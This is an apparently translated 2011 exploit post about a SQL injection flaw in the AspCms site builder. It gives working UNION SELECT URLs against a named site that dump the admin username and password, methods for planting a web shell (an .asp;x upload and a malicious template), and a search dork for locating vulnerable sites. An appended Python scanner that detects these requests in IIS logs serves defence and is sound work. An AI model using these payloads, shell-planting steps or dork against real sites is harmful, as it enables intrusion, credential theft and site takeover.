AspCms site-building system injection 0day - Vulnerability warning - Black Bar Safety Net

2011-09-08T00:00:00
ID MYHACK58:62201131804
Type myhack58
Reporter Anonymous
Modified 2011-09-08T00:00:00

Description

AspCms is a newly developed open-source enterprise site-building system with a new core. It can meet a variety of enterprise website requirements and supports template customization, extensions, and so on, so an enterprise site can be built in a short time.

Vulnerable file: /plug/productbuy.asp

The received parameter id is not filtered, which results in an injection vulnerability.

After the injection the page redirects very quickly, so it is recommended to use the copy shortcut.

EXP to dump the user name:

http://www.tmdsb.com/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

This dumps the account name for ID=1; if that account is found to have insufficient privileges, go on to test 2, 3, 4, ...

EXP to dump the password:

http://www.tmdsb.com/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

Back-end login address: /admin/login.asp

Getting a shell from the back end

1. Direct upload of .asp;x

2. The system configuration information

3. Template management: create a new 1.asp template and write the mA content into it.
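A defender-side check for the behaviours described above, as an added example that is not part of the original advisory: it scans IIS W3C log lines for requests to /plug/productbuy.asp whose id is not a plain integer, and for request paths containing an .asp; filename. The log lines, the chosen fields and the upload path are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log sample (illustrative, not taken from the advisory).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2011-09-08 10:00:01 GET /plug/productbuy.asp id=2 192.0.2.10 200
2011-09-08 10:00:05 GET /plug/productbuy.asp id=2+union+select+1,2,LoginName+from+AspCms_User 192.0.2.66 200
2011-09-08 10:00:09 GET /plug/productbuy.asp id=2%20UNION%20SELECT%201,password%20FROM%20AspCms_User 192.0.2.66 200
2011-09-08 10:01:00 POST /admin/login.asp - 192.0.2.66 302
2011-09-08 10:02:30 GET /upload/1.asp;x.jpg - 192.0.2.66 200
2011-09-08 10:03:00 GET /index.asp id=7 192.0.2.10 200
"""

ID_PARAM = re.compile(r"(?:^|&)id=([^&]*)", re.I)
SEMICOLON_ASP = re.compile(r"\.asp;", re.I)

def scan(log_text):
    """Return (line_no, client_ip, reason) for each suspicious request."""
    fields, hits = [], []
    for no, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the lines that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        stem = rec.get("cs-uri-stem", "").lower()
        query = rec.get("cs-uri-query", "")
        ip = rec.get("c-ip", "?")
        if stem.endswith("/plug/productbuy.asp"):
            m = ID_PARAM.search(query)
            value = unquote_plus(m.group(1)) if m else ""
            # A legitimate product id is a plain integer; anything else is flagged.
            if m and not re.fullmatch(r"[0-9]+", value):
                reason = "non-numeric id"
                if "aspcms_user" in value.lower():
                    reason += ", references AspCms_User"
                hits.append((no, ip, reason))
        if SEMICOLON_ASP.search(stem):
            hits.append((no, ip, "request for .asp;-style filename"))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule applied to id inside productbuy.asp before the value reaches the query is the corresponding fix on the server side.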

Search keywords: intitle:Powered by AspCms2